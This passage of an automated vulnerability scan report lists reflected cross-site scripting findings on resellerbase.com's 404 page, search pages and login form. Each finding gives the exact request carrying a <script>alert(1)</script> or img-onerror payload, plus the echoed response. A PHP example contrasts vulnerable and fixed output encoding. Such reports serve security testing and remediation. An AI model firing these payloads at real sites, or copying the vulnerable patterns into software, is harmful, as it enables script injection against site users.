Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/search.php?keyword=search...&Submit3=Searchfbfcb<a>a0541fccc41&opt=2 was not found on this server.</p>
...[SNIP]...

2.3918. http://www.resellerbase.com/goods-wholesale/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 6b84c<a>d699cf5c76 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /goods-wholesale/themes/kosmos/search.php?keyword=search...6b84c<a>d699cf5c76&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/search.php?keyword=search...6b84c<a>d699cf5c76&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3919. http://www.resellerbase.com/goods-wholesale/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload adc05<script>alert(1)</script>fa58f1fb939 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&adc05<script>alert(1)</script>fa58f1fb939=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&adc05<script>alert(1)</script>fa58f1fb939=1 was not found on this server.</p>
...[SNIP]...

2.3920. http://www.resellerbase.com/goods-wholesale/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 9dcad<a>9b176a56b1d was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /goods-wholesale/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=29dcad<a>9b176a56b1d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=29dcad<a>9b176a56b1d was not found on this server.</p>
...[SNIP]...

2.3921. http://www.resellerbase.com/goods-wholesale/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4cfc2<script>alert(1)</script>2b4b9b3b1db was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale4cfc2<script>alert(1)</script>2b4b9b3b1db/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale4cfc2<script>alert(1)</script>2b4b9b3b1db/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3922. http://www.resellerbase.com/goods-wholesale/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 72b28<script>alert(1)</script>7f99d5b8696 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes72b28<script>alert(1)</script>7f99d5b8696/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes72b28<script>alert(1)</script>7f99d5b8696/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3923. http://www.resellerbase.com/goods-wholesale/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4496d<script>alert(1)</script>83c328e920b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/search.php4496d<script>alert(1)</script>83c328e920b?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/search.php4496d<script>alert(1)</script>83c328e920b?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3924. http://www.resellerbase.com/goods-wholesale/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload fec3d<a>205be6d806b was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /goods-wholesale/themes/search.php?keyword=search...&Submit3=Searchfec3d<a>205be6d806b&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/search.php?keyword=search...&Submit3=Searchfec3d<a>205be6d806b&opt=2 was not found on this server.</p>
...[SNIP]...

2.3925. http://www.resellerbase.com/goods-wholesale/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload d2e6d<a>677235b1675 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /goods-wholesale/themes/search.php?keyword=search...d2e6d<a>677235b1675&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/search.php?keyword=search...d2e6d<a>677235b1675&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3926. http://www.resellerbase.com/goods-wholesale/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5e8c7<script>alert(1)</script>7adef2a3781 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/search.php?keyword=search...&Submit3=Search&opt=2&5e8c7<script>alert(1)</script>7adef2a3781=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/search.php?keyword=search...&Submit3=Search&opt=2&5e8c7<script>alert(1)</script>7adef2a3781=1 was not found on this server.</p>
...[SNIP]...

2.3927. http://www.resellerbase.com/goods-wholesale/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 7c2e5<a>baf365460cf was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /goods-wholesale/themes/search.php?keyword=search...&Submit3=Search&opt=27c2e5<a>baf365460cf HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/search.php?keyword=search...&Submit3=Search&opt=27c2e5<a>baf365460cf was not found on this server.</p>
...[SNIP]...

2.3928. http://www.resellerbase.com/googlepr.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /googlepr.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1dedd<script>alert(1)</script>a2c4c3c22c8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /googlepr.php1dedd<script>alert(1)</script>a2c4c3c22c8?link_id=12 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:58:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /googlepr.php1dedd<script>alert(1)</script>a2c4c3c22c8?link_id=12 was not found on this server.</p>
...[SNIP]...

2.3929. http://www.resellerbase.com/hot.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /hot.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 503cf<script>alert(1)</script>af5c84f45d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hot.php503cf<script>alert(1)</script>af5c84f45d1 HTTP/1.1
Accept: */*
Referer: http://www.resellerbase.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /hot.php503cf<script>alert(1)</script>af5c84f45d1 was not found on this server.</p>
...[SNIP]...

2.3930. http://www.resellerbase.com/index.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /index.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f4091<script>alert(1)</script>c0d98d8a04a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.phpf4091<script>alert(1)</script>c0d98d8a04a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:30:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /index.phpf4091<script>alert(1)</script>c0d98d8a04a was not found on this server.</p>
...[SNIP]...

2.3931. http://www.resellerbase.com/login.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /login.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2708e<script>alert(1)</script>809c8ff1917 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login.php2708e<script>alert(1)</script>809c8ff1917?f=1&b=%2Fcp%2F HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://www.resellerbase.com/add.php
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /login.php2708e<script>alert(1)</script>809c8ff1917?f=1&b=%2Fcp%2F was not found on this server.</p>
...[SNIP]...

2.3932. http://www.resellerbase.com/login.php [b parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /login.php

Issue detail

The value of the b request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37276"><img%20src%3da%20onerror%3dalert(1)>3a9b72f7f13 was submitted in the b parameter. This input was echoed as 37276\"><img src=a onerror=alert(1)>3a9b72f7f13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. The backslash that appears before the double quote in the reflected value (37276\"><img ...) shows that the application escapes quotes with backslashes, in the style of addslashes() or magic_quotes, rather than HTML-entity encoding them. A backslash is not an escape character in HTML, so the quote still closes the value attribute and the browser parses the injected <img> tag; this is a SQL/string-literal defence misapplied to an HTML attribute context.

Request

GET /login.php?f=1&b=%2Fcp%2F37276"><img%20src%3da%20onerror%3dalert(1)>3a9b72f7f13 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://www.resellerbase.com/add.php
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:23:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Content-Type: text/html
Content-Length: 9270

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Required</titl
...[SNIP]...
<input type="hidden" name="b" value="/cp/37276\"><img src=a onerror=alert(1)>3a9b72f7f13" />
...[SNIP]...
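The two reflection sinks recorded in this report, the custom 404 page that echoes the requested URL (2.3917 through 2.3931) and the login.php hidden inputs that backslash-escape the b and f parameters (2.3932 onward), reduce to the same coding error: output written into HTML without context-appropriate encoding. The following PHP is an added illustration, not code from resellerbase.com or from the scan; the function names are hypothetical, and the assumption that the real pages read $_SERVER['REQUEST_URI'] and $_GET['b'] is inferred from the responses, not confirmed by the report. It reproduces each sink with the report's own payloads and shows the corrected form beside it.

```php
<?php
// Added example: minimal reproductions of the two sinks seen in the report,
// each beside a fixed version. Not the application's real code.

// Sink 1: a custom 404 handler that echoes the requested URL into the page.
// $uri stands in for $_SERVER['REQUEST_URI'] (assumption about the real page).
function not_found_vulnerable($uri)
{
    // Raw concatenation: any < or > in the URL becomes markup.
    return '<p>The requested URL ' . $uri . ' was not found on this server.</p>';
}

function not_found_fixed($uri)
{
    // Entity-encode for an HTML text node; ENT_QUOTES also covers ' and ".
    return '<p>The requested URL '
        . htmlspecialchars($uri, ENT_QUOTES, 'UTF-8')
        . ' was not found on this server.</p>';
}

// Sink 2: login.php-style hidden input that preserves a parameter across a
// form post. addslashes() backslash-escapes quotes, which protects a PHP or
// SQL string literal but means nothing to an HTML parser: the quote still
// terminates the attribute value.
function hidden_input_vulnerable($name, $value)
{
    return '<input type="hidden" name="' . $name
        . '" value="' . addslashes($value) . '" />';
}

function hidden_input_fixed($name, $value)
{
    // Encode both name and value for a double-quoted attribute context.
    return '<input type="hidden" name="' . htmlspecialchars($name, ENT_QUOTES, 'UTF-8')
        . '" value="' . htmlspecialchars($value, ENT_QUOTES, 'UTF-8') . '" />';
}

// Inputs copied from the report's own requests (2.3930 and 2.3932), decoded.
$uri     = '/index.phpf4091<script>alert(1)</script>c0d98d8a04a';
$b_value = '/cp/37276"><img src=a onerror=alert(1)>3a9b72f7f13';

// Vulnerable output: the script tag and the attribute break-out survive intact.
echo not_found_vulnerable($uri), "\n";
echo hidden_input_vulnerable('b', $b_value), "\n";

// Fixed output: angle brackets and quotes become entities, so the browser
// renders the payload as text inside the paragraph or attribute.
echo not_found_fixed($uri), "\n";
echo hidden_input_fixed('b', $b_value), "\n";
```

Run with `php example.php` and compare the second line with the reflected value recorded in the 2.3932 response: the backslash-escaped form is byte-for-byte what the scanner observed, which is the quickest way to confirm that the application's defence is string escaping rather than HTML encoding. The fix is per output context: htmlspecialchars() with ENT_QUOTES for text nodes and quoted attributes, and the 404 handler should apply it to the URL as well rather than trusting that a path or query string contains only URL-safe characters.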

2.3933. http://www.resellerbase.com/login.php [f parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /login.php

Issue detail

The value of the f request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3988f"><img%20src%3da%20onerror%3dalert(1)>bdfb399a39b was submitted in the f parameter. This input was echoed as 3988f\"><img src=a onerror=alert(1)>bdfb399a39b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /login.php?f=13988f"><img%20src%3da%20onerror%3dalert(1)>bdfb399a39b&b=%2Fcp%2F HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://www.resellerbase.com/add.php
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:22:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Content-Type: text/html
